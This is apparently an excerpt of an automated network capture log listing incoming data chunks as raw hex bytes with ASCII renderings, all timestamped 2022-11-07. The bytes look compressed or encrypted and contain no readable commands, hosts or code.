2022-11-07 22:49:05 UTC	6216	IN	Data Raw: 90 2c 22 54 cf e4 1f a8 21 33 ef 15 22 64 b2 3c 08 f8 e3 06 78 6a c9 c1 fd f7 f9 bc d8 d1 c5 e8 41 84 ba dd 0a 01 5c 71 8a 47 e7 35 c7 23 dc 67 40 6d 4c 90 78 d1 6b fa 3e 31 a1 3b 2e 4b 04 82 48 fc 28 90 35 7a a4 3c 13 3d a4 cb a6 34 26 15 18 a7 66 87 3e 77 0e f8 24 11 33 c4 a3 c4 c6 07 4b 4d 08 2a 08 45 fb 84 0e 3b 1c be fd d8 2f 93 04 76 95 81 9e 55 33 77 e4 f1 81 d3 ee ff f6 be 9e 7d e8 9a cb ef 8a 54 ee 96 e7 f2 d2 07 65 a0 b3 6f ec dd ff 01 6b da b7 60 49 d3 a3 f8 91 fd ee 30 56 50 30 cd e0 fd 52 8e 38 eb d5 cc bd 46 c7 eb 88 b5 7c 4c ca 1a df 7a d2 77 4f e4 86 ce 78 3d 12 7e 90 65 13 ef 69 1d 20 15 ac 70 23 eb 37 97 78 e2 e0 28 73 56 eb 67 53 27 68 51 25 f1 e2 aa 78 2a 58 05 3f 6c 3a 16 64 ca 54 64 25 63 e8 bf 70 2d 34 73 3a 6e 54 ec 78 6f 27 7d 4e Data Ascii: ,"T!3"d<xjA\qG5#g@mLxk>1;.KH(5z<=4&f>w$3KME;/vU3w}Teok`I0VP0R8F\|LzwOx=~ei p#7x(sVgS'hQ%xX?l:dTd%cp-4s:nTxo'}N
2022-11-07 22:49:05 UTC	6232	IN	Data Raw: bf bf 75 9c 54 bc 40 ac 71 17 e5 4f de 55 70 50 be 5e a1 55 ac 3f fc 6c 12 85 3c bc 79 e8 1f 58 b4 af 7c 98 0c d4 52 00 9a 70 64 ad 06 21 79 0c b0 15 7b b2 5f b2 be 5d 94 39 92 bf 96 54 71 bf 10 aa 7f 66 81 d5 6a 75 17 b0 28 89 d8 a4 6b 9b b1 a3 1b b1 96 d9 66 87 8c c9 da 7f 18 9f 06 c1 e6 60 76 1f 31 bb 1e 2e 40 5b 8a 73 6c 9a 8b 27 3a 37 b3 6e 90 96 0a bd 6c 55 4f 97 57 54 2f b3 6d 54 66 d0 20 ab a1 30 78 f2 79 0b e6 26 32 d3 bb f7 0e 61 f1 67 d2 e5 fc 15 6f d4 54 31 fa a1 d8 63 c3 ba 1c 20 7c fe 2c 4f 51 77 13 73 e3 d5 78 ad a9 bf 33 19 2a 2c 89 d9 96 a4 e7 ac 76 66 6f a5 30 60 8c 37 b8 be c1 fa a0 7a 1a 2a 72 61 20 1a 57 74 7f fc 95 a0 74 a3 3a 67 6c 12 88 48 a3 65 bf 7c 87 b9 d8 c2 55 11 4b e4 e2 88 c4 ed b9 d9 54 a3 e4 e4 69 ac 0a 43 c9 0b 5f 3d c7 Data Ascii: uT@qOUpP^U?l<yX\|Rpd!y{_]9Tqfju(kf`v1.@[sl':7nlUOWT/mTf 0xy&2agoT1c \|,OQwsx3,vfo0`7zra Wtt:glHe\|UKTiC_=
2022-11-07 22:49:05 UTC	6248	IN	Data Raw: ab a6 35 62 e4 75 c1 05 d7 e9 ad eb 2e 20 40 f1 33 b0 4d a2 3e a7 0a c9 60 35 ec 9e f7 7f b5 6e 25 e4 91 3b 08 a8 74 f5 3a a5 2d 5c a6 a3 55 5f c1 fb 6a 87 71 e6 13 4d 9d 10 b8 2f 24 5b 6a 96 30 c8 e2 31 d8 9a 96 b6 32 5a b6 be e1 35 fa 7c fa b7 1c a8 d5 24 7f 71 48 5e 12 09 a0 78 97 72 e6 46 43 a8 44 73 af 5f f8 0d 20 ea ad c1 bf d0 e0 10 e8 d8 4b a5 67 25 06 cd 79 8c d5 61 e6 8f 4c 24 b3 3e 19 fe 8a c0 28 35 a4 7e 76 80 4d e4 b2 f2 9b b8 00 0b 7f 82 4c 59 01 cf 8e ce 40 16 7a 5a 34 a9 36 aa cd 92 bb 7f 65 86 a5 f7 d8 96 64 e7 77 68 5f b0 71 3f 91 24 b8 ce 83 0a b1 44 c9 34 e0 bd a0 e1 6f e4 4f 28 3e 2b 71 ab 31 38 dd c2 90 17 ae 4a e9 76 4c 31 fe a1 60 19 3c a8 e5 8a 27 9e ed 89 58 04 33 5a 27 5d 5b 74 9b fe 26 4d f4 01 d5 5a ec 69 99 cf d8 45 3f 52 80 Data Ascii: 5bu. @3M>`5n%;t:-\U_jqM/$[j012Z5\|$qH^xrFCDs_ Kg%yaL$>(5~vMLY@zZ46edwh_q?$D4oO(>+q18JvL1`<'X3Z'][t&MZiE?R
2022-11-07 22:49:05 UTC	6264	IN	Data Raw: 07 38 8f 22 6a 84 3c 43 af f3 5f be e1 a4 48 ec bf 04 3d 76 78 57 ed b7 b1 39 bb 0a 27 63 05 a6 88 8d 19 40 b1 43 78 ef 8f 0f fa 28 be 19 39 b9 65 dd f7 3d 3b 8e 30 08 ab c5 1b a6 62 8e 17 65 fa 7a 9f da a3 3e 44 78 fe 0b b3 4e 45 38 0a a6 cb 1d 3c 1a 18 17 4d f1 28 55 77 f6 c9 d5 66 60 e3 f6 87 76 d0 69 0e 4c 09 ff c0 a0 74 0b ee 7a f8 28 2e d7 d6 26 3b 83 a7 6f 57 6a 0a e4 83 1e 46 2c 72 40 f5 5f b8 25 1c 38 27 eb ae 00 0e c3 5d 4c 91 d5 59 5b 0b f9 46 43 b3 19 47 bc c7 b9 0f 6c ba be 60 9b ae 75 67 d8 e5 82 27 7e 5a bd be 0f 25 69 1c 2b 69 48 21 e3 dd 37 03 0f a6 24 7f 91 f9 cd a4 11 51 94 32 e0 8c b9 06 d9 31 c9 89 b7 55 01 d4 27 be 8c fd e4 21 44 a9 7c f4 ba 44 f4 eb 8d b9 5a 88 b7 0e 1e 58 93 49 64 5b 3e a8 b9 1c 05 82 cd 9e 75 21 59 88 37 eb 85 66 Data Ascii: 8"j<C_H=vxW9'c@Cx(9e=;0bez>DxNE8<M(Uwf`viLtz(.&;oWjF,r@_%8']LY[FCGl`ug'~Z%i+iH!7$Q21U'!D\|DZXId[>u!Y7f
2022-11-07 22:49:05 UTC	6280	IN	Data Raw: 27 fa 24 e0 20 83 fd e4 46 ae 87 ee f7 29 19 62 50 1d 76 6d ab ce 5a 81 fd 19 5a aa ac ae 24 c3 0f 21 0f 09 eb eb 3e 74 91 d1 73 ef b1 29 9b 7b 56 b1 19 c1 e5 ef bf 20 f1 0d 6a 0f 7b 9a 48 0a 3e b7 e8 13 67 5f 8c 47 19 12 1e 5f eb 50 74 26 c4 fb cb a6 e8 55 4b e0 74 61 d2 5c 1f aa a4 b5 55 f5 7a 8c 6c 37 a0 2f ec 27 94 3d c7 03 47 cd e1 65 fe fd 01 4c 0b 40 b5 63 81 ae 6b a3 fa ef 27 53 7b 61 56 17 24 76 f2 20 12 92 ff ae ae 1c 7b 0e 68 ed 48 48 ea dd ef fb ea 4c e3 1b 3d a7 a4 67 8e db b5 33 b0 a7 fe 70 20 af a2 7b 19 da e8 1d c6 86 60 a8 76 93 d0 4e 0c 55 72 21 69 b9 b6 d4 dc 88 44 d8 63 ab f9 72 18 06 5e e5 4d 72 cf b5 f5 e1 53 24 52 27 f9 55 57 b6 de 69 6a 79 4e a7 2d 7b c1 d2 81 d1 95 09 92 f8 70 3a 45 72 50 6a 20 1e 81 25 fa 70 da 8f 75 42 e5 9c 3b Data Ascii: '$ F)bPvmZZ$!>ts){V j{H>g_G_Pt&UKta\Uzl7/'=GeL@ck'S{aV$v {hHHL=g3p {`vNUr!iDcr^MrS$R'UWijyN-{p:ErPj %puB;
2022-11-07 22:49:05 UTC	6296	IN	Data Raw: 66 38 d9 00 5a c9 71 d8 9b c5 c5 55 9a 5f 73 58 59 d1 d1 b8 66 37 e1 4e 2f a6 19 d9 73 9d 29 2e df 9e 14 e9 d2 28 f5 c5 f8 80 ef 46 6d 3e e2 e4 5b 1e 48 d8 34 e2 4b 45 78 f8 14 14 41 e4 5e e6 05 45 84 4f 79 9b 0d de e3 0c 48 9f 23 f8 05 c9 b1 90 a8 d4 57 fc 5a ac 02 1d a9 17 6e 39 27 80 c3 5f 43 02 a3 18 bc b5 5e 0a 98 45 60 7c d5 93 11 3b 27 14 b4 47 03 0e 38 eb 08 85 2a 09 45 1a af 4d 48 7b 62 bb a5 ad c3 02 51 5d 44 e6 eb 41 f0 0e 83 a3 88 38 ea aa 70 6f 85 f9 e6 83 84 6a 6e 28 62 20 69 f4 57 34 54 72 2c d3 be e3 2e f2 22 37 0b 2b 5b e2 5a bd 5c 7d 72 99 be a3 27 41 4d f8 11 60 30 62 11 4c 61 b0 40 7b bc 90 be f0 5b a5 91 d4 0d 1e 18 12 ce be 27 6b 25 5c 00 90 f2 f4 e8 22 a3 2d 42 a5 62 d5 06 ad 86 ed ae 89 0d 31 5b 6d 74 37 70 da d5 58 f4 1a 35 ae 7d Data Ascii: f8ZqU_sXYf7N/s).(Fm>[H4KExA^EOyH#WZn9'_C^E`\|;'G8*EMH{bQ]DA8pojn(b iW4Tr,."7+[Z\}r'AM`0bLa@{['k%\"-Bb1[mt7pX5}
2022-11-07 22:49:05 UTC	6312	IN	Data Raw: 55 e1 76 46 09 5b 10 4c 99 98 11 11 1f 36 b8 9f 44 68 16 78 89 b6 4c 75 50 dd 2b 5e 33 71 cf df 1e 90 7e 89 8a 72 83 4f 3b f6 48 6b 4f 6b ac 09 a4 41 6e b4 85 17 26 27 57 64 ee f4 54 1e 3e 46 48 c5 7f ba 62 ed 5b c4 c4 b3 e4 59 a6 9f f9 a3 8a 89 e8 44 ec f6 cb d4 6a 56 11 17 4b 7d 64 f4 2d de 3a 20 d2 fe fa 12 0b 56 2e 36 36 4d 96 07 33 33 ee b9 3c e7 7d 25 36 b4 49 7a 1c 61 86 cb 44 7c 87 39 5b 95 5c ec 05 4a 5d 1b 54 a9 ee be 69 44 4a 67 49 1e ba 3b 6e a1 4d ec 71 38 77 24 21 28 78 5c 77 f1 6f 9b 91 31 b7 09 74 69 a5 28 48 cc 56 58 5c 0d d2 37 78 78 0c 34 a5 6f 6e 5a 0b 50 7b 01 1f 40 33 11 21 53 04 ce d6 2f be 39 09 88 84 6e f5 b7 9a 6c e2 b7 e6 9c ad 9e fb 33 72 01 62 2b 83 05 64 08 39 6f 66 e9 56 4e 86 5e 57 c4 cd 55 56 53 e3 16 5f b2 69 c8 e7 5c 7c Data Ascii: UvF[L6DhxLuP+^3q~rO;HkOkAn&'WdT>FHb[YDjVK}d-: V.66M33<}%6IzaD\|9[\J]TiDJgI;nMq8w$!(x\wo1ti(HVX\7xx4onZP{@3!S/9nl3rb+d9ofVN^WUVS_i\\|
2022-11-07 22:49:05 UTC	6328	IN	Data Raw: 39 11 87 c6 15 68 ef ef 12 7d 65 9b fc 64 d8 63 40 ca bf bd e8 47 65 43 8f 93 f1 7a 62 6b 9f eb 92 60 21 72 e0 52 ae 24 af 0d 33 2b ed 95 7d 96 73 08 b9 11 d5 7e ab 19 19 ff ac 3f 63 a1 07 04 32 e1 71 98 8a 61 45 e9 2f 61 ee 00 d6 2a da d5 93 cb e5 19 9e fb de 72 43 29 1d 3d ec 78 11 59 07 c0 a5 00 30 47 85 b5 6b 0b 79 2c ba 27 eb 66 88 f2 a0 5a 5c 14 58 51 4b 79 07 be 80 2e d9 03 29 31 0a 21 12 38 24 eb 59 31 13 ce e9 be 19 3b 93 6d da 07 3f 44 6f 55 ad 4b d2 c3 67 e9 7f 0f 03 1e 99 d7 7f 5e 80 af 87 3d bb e5 65 b6 5e 7f 60 20 6a e2 ec 26 e0 5d 11 6b c9 f3 a3 47 c6 ec 3d 50 61 ea 27 a5 fc e7 3a b3 8c 22 42 53 5a ba dd 64 5e 33 bc e0 e1 d1 19 4c 32 bb 4c 44 0f 82 df 8d 3e ab ca 36 54 b0 59 4d 20 d9 b2 be 78 55 0e 46 e7 8c 50 1a fa a0 56 6c 55 b1 3b 15 7d Data Ascii: 9h}edc@GeCzbk`!rR$3+}s~?c2qaE/a*rC)=xY0Gky,'fZ\XQKy.)1!8$Y1;m?DoUKg^=e^` j&]kG=Pa':"BSZd^3L2LD>6TYM xUFPVlU;}
2022-11-07 22:49:05 UTC	6344	IN	Data Raw: 98 40 64 8f 6f b3 14 a3 3b 0f a5 d0 44 61 69 ca 58 a3 36 b0 51 46 a9 9e 1c 15 c1 07 42 62 c1 fe a0 5f 81 d8 24 df a6 71 d6 1e 9f 4f ed 50 fc 2b 52 48 7c e7 99 e4 8a 7f 59 f4 4c 38 fc be fe ab 5e 27 75 65 10 53 7e 64 9a a8 19 a5 19 0c 2d 52 44 54 04 1f 69 32 31 d6 ae 00 18 4d 17 91 cb bb 38 1a 3d e0 13 c0 ea 88 64 cf d3 2e 4a 7c 26 59 57 97 7d bb f4 ef 1e c7 32 d9 06 f1 6f a2 75 e5 bf d1 6f 10 5a bd 86 45 f2 a6 c5 87 8f bd 2f 01 60 03 46 ab 36 6f 1b dc 0c 64 7d 3f 84 e5 64 2a 25 ef 69 20 a6 49 8e 78 be 24 79 e3 2b c0 a8 1b 73 21 6f 5b 6c ba cc eb 19 78 53 2f e7 b1 06 48 44 e9 6c d2 71 7b a2 d4 36 72 70 89 5b e9 a1 13 3d 54 b5 e0 d2 ea c1 6d 18 7e 88 48 62 7e 16 e8 d9 33 7a 0d 54 e4 fb 74 6d 14 d9 c5 71 49 52 26 41 c5 64 95 51 15 ad 18 68 51 f6 67 66 27 4d Data Ascii: @do;DaiX6QFBb_$qOP+RH\|YL8^'ueS~d-RDTi21M8=d.J\|&YW}2ouoZE/`F6od}?d*%i Ix$y+s!o[lxS/HDlq{6rp[=Tm~Hb~3zTtmqIR&AdQhQgf'M
2022-11-07 22:49:05 UTC	6360	IN	Data Raw: 68 4b b1 10 0f 21 9b 0d 96 3a 64 d8 b7 7a c2 cd 6f 2c 16 f9 2b 07 b5 a2 75 af 7a 33 2e 96 69 7b 61 6e d4 7a 39 87 f5 40 a3 b3 92 10 eb 74 7b b2 83 76 5b 46 bd cd 10 29 f6 7a 52 25 00 63 b4 f0 36 47 5a 0f 6b e3 27 9d 79 15 ec 10 d1 40 70 d3 d7 b5 bd cb 67 74 66 21 5e fa 1a ee 3d 55 70 bd a4 f8 f4 a8 14 fd d1 ed 16 a7 39 71 da 23 61 28 ff f4 2c 19 f8 e1 03 1c 54 4c 7b 78 05 65 0a 6a 62 a2 98 4c 80 58 73 9a 0d 15 b6 78 56 f8 e0 71 53 74 a6 bf d7 bf c9 b8 ad 48 cd 7d 2c a1 e4 e2 71 77 df 3a cf 42 18 08 0b 69 47 ea ae f7 ad 9a 60 9a b9 6f 28 8f ad df 0b ce 92 29 b1 c2 4d 92 de cf 72 c9 72 67 f7 f1 6b e3 69 66 06 8c 91 5d ce 2d e7 02 ff 54 b1 fa b2 e4 2e 9e 1c a7 be 0f d7 af 1b dc 8a e3 85 0d 79 dc 0d 38 e1 5a 54 e6 6f fc 7c e3 a2 0f 9c 9a 15 fb a2 e0 3c 46 91 Data Ascii: hK!:dzo,+uz3.i{anz9@t{v[F)zR%c6GZk'y@pgtf!^=Up9q#a(,TL{xejbLXsxVqStH},qw:BiG`o()Mrrgkif]-T.y8ZTo\|<F
2022-11-07 22:49:05 UTC	6376	IN	Data Raw: dc d1 54 86 30 67 74 f5 76 7f 6b 2e 62 61 52 85 af 8c ce 98 ec 95 6b f2 fa a8 92 56 33 67 b1 80 1a 72 a8 60 22 7d f3 74 74 10 7c 38 a6 7d f4 42 af d2 3e 79 2e f2 95 b9 60 a4 5b 0d 28 3c af 74 54 6f 0a ae 31 80 d0 c6 59 ad f1 7b 58 91 00 20 c2 54 25 7f ff 4a 4d c6 7c 2c f9 99 9f 30 63 54 5d 65 dc 51 7f 9d 94 4b 86 1e 06 d5 9e 7e 3d 62 4f 6a 57 74 82 31 e9 4a 5a 5f 45 48 e7 7a 74 8f 65 0d b6 f8 28 5c 3e 5a a8 23 2f de 44 70 08 09 41 99 31 24 7a 21 aa 2a 41 6d 3f d5 3c 57 e7 1d 7b 79 db a0 84 54 0f 72 b7 67 14 31 07 e9 37 f7 2f ac 98 d1 45 9b 48 25 39 52 33 6f 16 5d b4 b6 f0 59 cc f8 1f c7 6e 7e 7c 6d f7 93 13 0a 38 6b 3a 20 32 7f 7c 76 a7 cc 36 9d 6b 25 1f a8 46 f7 c0 69 76 32 41 5f 68 5f 61 a7 4a 68 7c 6d 61 a8 02 c0 a0 f0 74 27 e6 a5 3d d1 e5 7a 77 c2 2f Data Ascii: T0gtvk.baRkV3gr`"}tt\|8}B>y.`[(<tTo1Y{X T%JM\|,0cT]eQK~=bOjWt1JZ_EHzte(\>Z#/DpA1$z!*Am?<W{yTrg17/EH%9R3o]Yn~\|m8k: 2\|v6k%Fiv2A_h_aJh\|mat'=zw/
2022-11-07 22:49:05 UTC	6392	IN	Data Raw: 39 66 47 4a d8 fd 4f 43 37 ac 94 52 b9 fc ff 55 41 32 32 33 8b 8d 01 08 0c 3e 63 68 33 1a cc e5 d1 65 bb db 91 7c 30 1a c4 d5 55 6a 5e 1e 68 7f 6a ab 88 77 cf 98 bd 0b fc 9f 91 66 9a 21 88 a3 c8 a8 f8 c6 68 96 6d a4 6f e3 d2 bd 6e 60 f5 b3 2f 68 f9 74 b9 62 e1 87 7c da d8 1b 4b f4 1c f7 5d 10 f6 dc c0 bc 0e a2 3c 79 37 af 5a 3a 43 33 e7 f0 62 76 7f 46 a9 8f fe d3 43 5d 3a b8 2c d1 73 5c 38 37 90 96 fe fd 42 61 58 20 f5 c5 0a eb 6d f0 ed 4b 3c 24 92 c1 4f 66 e9 e2 02 9c 2d ee e4 99 78 91 09 ee 45 cd e5 03 50 dd cb 04 c8 3d d6 11 95 17 83 70 5d 6e cb 35 ed f1 bb 51 ab 23 6a 31 69 67 36 89 ff 9c 37 a9 3e d1 a9 e0 ba 30 79 86 b4 c3 d2 ce 89 7d 77 15 8e 76 e7 2b d2 a2 99 eb 17 c9 38 01 59 28 0b f1 2d a9 a3 90 80 15 63 4a f8 9a 9e 4b 83 a3 f9 4f e5 ad 48 8a 64 Data Ascii: 9fGJOC7RUA223>ch3e\|0Uj^hjwf!hmon`/htb\|K]<y7Z:C3bvFC]:,s\87BaX mK<$Of-xEP=p]n5Q#j1ig67>0y}wv+8Y(-cJKOHd
2022-11-07 22:49:05 UTC	6408	IN	Data Raw: b3 09 c1 6e bf c0 20 41 7e 05 62 3a 9a a8 1b 91 6c de ca 70 51 86 47 f0 c8 a4 94 4a da a7 fc 77 74 90 35 02 a1 d2 b5 c9 5b 3f 85 2c b8 e9 d8 07 60 9c df c4 8f 82 7b 64 cd c3 b7 54 14 75 5c 16 c4 16 fb c1 ed 68 13 62 38 aa b1 71 57 9f 64 7d 25 31 ca 52 7f 41 b9 5d 5e fb e1 6d 72 f4 35 37 50 74 cd 7c 57 3c 4d f4 b7 01 73 05 64 79 a9 6b 49 ea 3f 41 cc 96 1a 97 d3 50 14 0b e1 60 90 ea 56 38 bb fa c2 24 9f cd 6e 17 be 96 62 98 e6 f1 00 f1 6c 76 78 4e c5 71 f4 3d 7f 1e 43 d0 e4 8a 28 06 02 e6 4b 3b 0f 45 57 4f 67 61 21 16 26 d5 c9 78 3d 2c 4a a0 27 43 05 43 04 02 57 0b 8d 21 60 10 39 5a 25 1e 99 27 38 4b be a6 d2 8d a9 cb 30 26 dd 1d 81 62 e8 5f f4 72 cd 1d ef b7 0b dd 07 98 39 53 e1 b3 e0 60 21 21 5e ee 28 51 ec 01 3e 7b ea 67 d2 0e e4 47 1b 57 72 57 81 f6 78 Data Ascii: n A~b:lpQGJwt5[?,`{dTu\hb8qWd}%1RA]^mr57Pt\|W<MsdykI?AP`V8$nblvxNq=C(K;EWOga!&x=,J'CCW!`9Z%'8K0&b_r9S`!!^(Q>{gGWrWx
2022-11-07 22:49:05 UTC	6424	IN	Data Raw: d5 29 b8 2e ed 2a 6e c3 3e 4e 99 0f f6 65 63 a6 a8 15 2d 75 43 b1 af 28 d3 aa 61 65 66 a3 2a 65 32 cf 0d 48 e6 6c e4 ee a2 71 6a e3 f6 6a bf c3 50 9d 02 d8 d3 a4 2e 61 5e e5 97 09 17 1e 70 ea 80 c8 a0 22 21 c0 e1 26 1a 78 3d 86 3f 7f b1 b8 b9 95 92 9e bf 80 d5 37 38 70 38 f8 5c 11 4b 26 80 a4 99 59 12 aa 53 2b 0a 74 f9 17 a4 68 a8 95 47 a3 77 52 55 63 6d 73 4f f9 75 34 a8 6d 6a 65 b8 64 34 4a 75 40 6c 79 ce cb 74 41 5e 17 b9 61 71 a2 67 69 d2 a3 f0 ea 79 ac 8d 57 77 e8 73 82 85 c0 e9 c2 1e dc ad 56 72 cf f4 96 c5 87 85 70 7c 51 c3 a5 81 87 c6 60 80 f9 a1 03 cf 7f b1 1b dd 99 8e 17 8c 82 78 3e ae 8b 0a f5 bf 6a 16 14 b9 ba 7c ad 6f 9c 59 aa 4a 7d 72 7c fe 56 6d 86 b6 75 97 68 ae 86 af ef e2 4f b3 f3 f6 6f af 63 f3 bf 4d a2 64 52 52 eb 23 5c a1 be a8 0d a1 Data Ascii: ).n>Nec-uC(aefe2HlqjjP.a^p"!&x=?78p8\K&YS+thGwRUcmsOu4mjed4Ju@lytA^aqgiyWwsVrp\|Q`x>j\|oYJ}r\|VmuhOocMdRR#\
2022-11-07 22:49:05 UTC	6440	IN	Data Raw: e6 ff 5f 4d 79 52 65 1a 68 e0 b7 36 42 30 f8 94 51 49 f1 4e 20 74 fd e0 5b 75 5f f3 9c f6 53 27 b9 e5 30 64 3b 4f a3 61 10 7b 7c b8 11 69 52 e8 2e 93 6c 2a 17 1e 42 f8 32 7d bf da 2f fe b7 56 7c 61 ff 3b 6c 6d 74 dc 2f 72 12 b1 32 33 1d f8 07 09 0f 24 c6 e5 c2 b2 24 d4 79 7b 91 c7 f8 6f d7 71 59 9c a8 e7 33 32 fe eb 60 16 6e bf d0 63 f6 45 e1 71 6a f5 e0 41 52 88 2f 48 22 7d 1f 4a 32 cc be 2e 4e f4 0b 97 24 93 c3 d2 44 da 2f d5 7b 3d 23 e6 58 e8 69 15 64 f4 38 84 f4 1a a4 b9 af cb cc 58 77 df 3c 68 a4 7b 63 be 4a a8 70 9c 6a 7f 15 3f f7 55 41 28 fc 7b 6d 71 bc fe 3c bf 42 67 58 0d df eb 17 05 9c 16 29 e6 da 0b c0 f3 2f f7 b7 95 11 54 7a a8 b0 22 98 2d 74 de f6 d3 b6 e9 3a be 3d a8 93 af 18 46 cc f6 2c 9a eb 7f 5a f5 f2 e8 1c 56 e2 31 2f fd 02 3a 1e 20 51 Data Ascii: _MyReh6B0QIN t[u_S'0d;Oa{\|iR.l*B2}/V\|a;lmt/r23$$y{oqY32`ncEqjAR/H"}J2.N$D/{=#Xid8Xw<h{cJpj?UA({mq<BgX)/Tz"-t:=F,ZV1/: Q
2022-11-07 22:49:05 UTC	6456	IN	Data Raw: 6a 41 79 e1 57 4f 4c 3b 5a e0 68 02 f4 58 49 5c 40 4d f0 29 5e 47 2a 2d 50 7a 4b be 2b 29 26 b4 06 08 b0 28 b1 11 09 e9 29 8d 2d ad e6 be be 34 6f 77 df 06 e4 dc 92 84 3b 21 10 33 55 83 4c 64 6c bb f9 10 04 cf 71 4e f6 2b 7d fe f7 9e 10 8e a4 1a 3c 7e 05 58 4c a8 d0 07 b6 b5 1f bb 69 ee 69 2b d5 44 01 13 f5 50 34 10 2b 52 0c d7 7d f0 8a bf fa 95 29 03 b6 7e 7d b8 68 4e e0 77 22 ad b5 e5 38 04 fe f6 96 34 18 43 8f 70 18 7d 41 fb cf 76 8a 8e 7f ea 3f 93 cd 92 fd 22 b1 f0 2c 6f 17 c4 74 30 bc dd e7 e0 e6 be 70 ba b2 38 16 6f fe ca b2 2b a6 6d 93 5e e2 0f 38 fa 96 15 56 ba 3a 99 51 08 ed 40 d4 b8 76 3e 83 04 5e 5b b9 8e 2f 6c 3e 93 b4 c6 93 90 23 77 23 8a e8 71 9f ee e4 2e 1b 26 5d c8 b8 8f 53 7a 7d 51 e0 00 d5 40 9c 8e 34 6c 37 b1 d8 ee 58 7c b7 e5 77 be 2b Data Ascii: jAyWOL;ZhXI\@M)^G*-PzK+)&()-4ow;!3ULdlqN+}<~XLii+DP4+R})~}hNw"84Cp}Av?",ot0p8o+m^8V:Q@v>^[/l>#w#q.&]Sz}Q@4l7X\|w+
2022-11-07 22:49:05 UTC	6472	IN	Data Raw: 78 67 3f a7 56 ce ae 5e 74 9b 49 40 69 03 f8 ab 4b 8e 4d 08 fa eb 3b 49 7a c8 95 7d 12 8f a5 08 ec da 5a d5 3b d4 67 6f 25 3d f8 05 20 5f aa 0f 70 2e 20 2c 31 26 9a 85 44 33 89 12 38 bb 3b 7b 6f 64 f5 40 7a db 5a e8 9c 45 46 8e 23 a7 1b 96 74 19 c2 4b 24 e8 74 6e f7 67 68 a1 a5 48 35 37 ef 0a cd 07 5d 60 28 b2 39 55 21 16 54 28 90 8f fd 93 9e 31 9a 26 44 64 00 44 93 0c b1 d4 1c 6b e1 6a 53 38 e8 6b 25 c8 58 c2 7f ee b1 40 aa 14 6e 59 38 05 cf 1a b3 e7 60 96 58 da db ee f2 1f be 25 59 66 4c 1d 7a 2f 6a c8 fb 66 ea 60 1d 4c b1 1b 79 ee 39 3b 40 89 60 39 38 17 9c 38 b2 cb 82 86 94 99 f2 e7 ef 08 20 4c ab 44 6e b0 7f 06 d0 8a 7b 6d 64 e3 d5 e7 90 39 b1 ec f5 fa 00 3c 67 68 39 ee de 9f 68 ad 51 e3 48 f4 8a 30 3d 74 fd 0a 24 14 3c cf 22 d1 0b 39 3c d7 01 59 0a Data Ascii: xg?V^tI@iKM;Iz}Z;go%= _p. ,1&D38;{od@zZEF#tK$tnghH57]`(9U!T(1&DdDkjS8k%X@nY8`X%YfLz/jf`Ly9;@`988 LDn{md9<gh9hQH0=t$<"9<Y
2022-11-07 22:49:05 UTC	6488	IN	Data Raw: 9f f9 5d b5 be e9 0d 09 7a e7 22 eb 4f 48 9c 73 7f c1 5e b8 5a b7 47 64 ac 79 d0 f2 63 1d 1f ce 14 94 93 3e 4c eb 6d 0d 4e 53 cd 5e 6d dc 73 49 7c 2a 4a 8e 4d be 6b 23 14 fd a6 cf e2 ee 75 28 84 ea 83 40 d8 39 7a 2d 4b d1 b5 8b e7 ab 92 32 6e bd 72 c0 f2 9e 3c 75 5d 1d fa c9 bf 37 52 8f 27 db a6 74 36 83 3a 66 c3 70 0d 91 40 46 b9 8b 3c f6 30 b4 22 65 2d 35 65 06 87 6d 21 81 1b 7f 46 6f 0d b0 20 60 3c a8 1b b9 dc 0a a8 eb 86 e0 02 7b 4e c3 17 4f 20 9b 35 45 dc 1e b1 a5 0d b4 aa c8 4a fc 7a b3 fc 35 1a 02 fe ac a8 3e 38 b6 74 58 7a 46 13 bf 20 f3 b9 90 e1 21 93 3e 74 4c ee fd 84 c4 40 c6 77 21 79 69 5e 7b 27 48 0b 57 ff 5e 11 65 dc 41 03 bc 2e b9 db af 7c 20 61 b1 e2 21 55 96 04 6c 18 69 7c 56 68 44 30 70 fc 15 9c 37 71 66 5b 22 cc d7 31 89 48 14 6e 46 2b Data Ascii: ]z"OHs^ZGdyc>LmNS^msI\|*JMk#u(@9z-K2nr<u]7R't6:fp@F<0"e-5em!Fo `<{NO 5EJz5>8tXzF !>tL@w!yi^{'HW^eA.\| a!Uli\|VhD0p7qf["1HnF+
2022-11-07 22:49:05 UTC	6504	IN	Data Raw: 4d b9 b8 00 ce 37 d2 1c 7e 67 1d 6c ed bb 35 67 c7 6e 24 6f 41 f1 6e 6e 8e 92 7c c8 bb f5 66 19 7b 7e 08 8f bf 7d 78 65 65 11 96 c2 5f 97 b7 51 d2 85 12 61 3c 4c 09 fc 61 ff 26 8a a7 7e 12 72 70 f7 fe ab a0 b3 93 d4 27 22 ff c8 16 17 b4 e1 4a 1a ad 8b b4 43 aa 6b 18 04 bd 11 73 c0 b6 0d 37 37 0d fa 04 60 e4 3a 12 6c aa 69 af 25 c8 07 01 45 4e ba 4a 13 7e 77 fe f8 50 79 a5 97 a4 7a f7 e3 b9 07 bf 6d 7e b8 ae 5a 9b 0c 2b 80 b6 26 34 4e b2 c7 bb 55 9b 4d 5b 0e 5d c8 52 39 b9 15 9f b1 6d 5d 3a f6 e4 7b ca e1 62 b8 9d 13 ff 82 af c5 38 48 80 5b 93 92 3c c1 c8 35 ce 6f 27 e4 c4 37 66 75 78 9b 46 49 5e 35 3e 2e bf 8e 0b 40 58 a2 2c 43 74 89 99 47 e0 92 13 1e 5a 8a 3a 2f 85 b8 48 4d aa af 57 65 d1 2d 99 47 b4 f9 fe a7 dc e5 3a 69 ce 7f eb 1c 37 3b 36 81 20 69 06 Data Ascii: M7~gl5gn$oAnn\|f{~}xee_Qa<La&~rp'"JCks77`:li%ENJ~wPyzm~Z+&4NUM[]R9m]:{b8H[<5o'7fuxFI^5>.@X,CtGZ:/HMWe-G:i7;6 i
